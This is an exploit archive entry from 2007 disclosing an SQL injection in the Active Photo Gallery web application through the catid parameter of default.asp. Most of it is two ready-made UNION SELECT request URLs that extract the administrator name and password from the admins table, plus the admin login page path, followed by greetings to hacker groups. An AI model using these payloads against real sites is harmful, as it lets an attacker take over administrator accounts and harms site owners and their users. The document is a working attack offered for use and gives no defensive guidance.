id: 1629
date: 03/21/2007
title: Active Photo Gallery (default.asp catid) SQL Injection Vulnerability
author: CyberGhost
cves: 

====================================================================
Active Photo Gallery (default.asp catid) SQL Injection Vulnerability
====================================================================



#Title  : Active Photo Gallery Remote SQL Injection Vulnerability
#Author : CyberGhost
#My Web Site : http://aspspider.org/cgsecurity

#Vuln.

#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !



#  0day.today [2023-03-22]  #